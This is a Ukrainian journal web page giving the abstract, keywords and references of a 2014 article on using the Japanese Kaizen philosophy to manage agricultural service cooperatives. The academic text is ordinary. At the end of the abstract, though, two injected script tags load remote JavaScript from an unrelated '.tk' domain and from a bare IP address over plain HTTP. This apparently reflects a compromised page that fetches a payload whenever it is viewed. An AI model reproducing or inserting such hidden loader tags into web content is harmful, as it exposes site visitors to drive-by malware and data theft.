ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 005.2:631.115.8
Історія аграрної економічної думки

Концептуальні засади японської філософії Кайдзен в управлінні сільськогосподарськими обслуговуючими кооперативами / Петер М. В. // Економіка АПК. - 2014. - № 8 - С. 76

Розглянуто питання вдосконалення управлінських механізмів сільськогосподарського обслуговуючого кооперативу в сучасних умовах в Україні: досліджено теоретичні основи японської філософії Кайдзе́н, її основні елементи, проаналізовано її роль у діяльності сільськогосподарського обслуговуючого кооперативу як інструменту ефективного управління. Дослідження показує значимість такої концепції для сільськогосподарської обслуговуючої кооперації в Україні. Запропоновано заходи, спрямовані на поліпшення функцій кооперативу, його менеджменту на основі принципів даної філософії та можливості її використання, а саме: модель Кайдзе́н в управлінні сільськогосподарським обслуговуючим кооперативом, методику роботи Системи пропозицій у сільськогосподарському обслуговуючому кооперативі й принципи реалізації стратегії Кайдзе́н у рамках сільськогосподарського обслуговуючого кооперативу. Рис.: 3. Бібліогр.: 13.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: сільське господарство, обслуговуюча кооперація, сільськогосподарський обслуговуючий кооператив, Кайдзе́н, управління, філософія управління, концепція, стратегія, менеджмент, система безперервних поліпшень

Список використаних джерел

 1. Вадан О. Кайдзен. Системные принципы [Электронный ресурс]. – Режим доступа: http://bizentropy.biz/articles/79-kajdzen-sistemnye-principy.html.
 2. Высшая школа бизнеса МГУ имени М.В. Ломоносова [Электронный ресурс]. – Режим доступа: http://www.mgubs.ru/?id=810&news.
 3. Гончарова І.І. Застосування принципів філософії кайдзен у діяльності підприємств сфери послуг / І.І. Гончарова // Маркетинг: теорія і практика. – 2008. – № 13. – С. 58–63.
 4. Марков В. Кайдзен – долгосрочная стратегия японского менеджмента / В. Марков, П. Рабунец // [Электронный ресурс]. – Режим доступа: http://www.leaninfo.ru/2010/06/.
 5. Костенко Т. Использование преимуществ системы кайдзен для повышения производительности труда / Т. Костенко. – Вісник Київського нац. ун-ту імені Тараса Шевченка. – Економіка. – 2013. – № 10(151).
 6. Ничитайлова Н.С. Роль концепции кайдзен в совершенствовании экологического менеджмента в регионе / Н.С. Ничитайлова // Проблемы регионального и муниципального управления. Сб. докл. междунар. науч. конф., апрель 2010 г. – М.: Российский госуд. гуманит. ун-т, 2010. – С.132-136.
 7. Садченко Е.В. Экомаркетинговые стретегии «кайзен» /Е.В. Садченко // Механізм регулювання економіки. – 2009. – №4 (44). –Т.2. – С. 107–114.
 8. Швед В.В. Кайдзен менеджмент – японський шлях сучасних підприємств / В.В. Швед // Наук. вісн. – 2011. – № 10 (135). – С. 13–19.
 9. Bowles, J. & Hammond, J. Beyond quality how 50 wining companies use continuous improvement, 2001, NewYork: Putnam.
 10. Barnes,T. Kaizen strategies for successful leadership, 2006, Pitman Publishing London.
 11. http://uk.wikipedia.org/wiki/Кайдзен.
 12. http://www.biztimes.ru/index.php?artid=907.
 13. http://www.strf.ru/material.aspx?CatalogId=223&d_no=25935.
Читати статтю: 14_08_76-80.pdf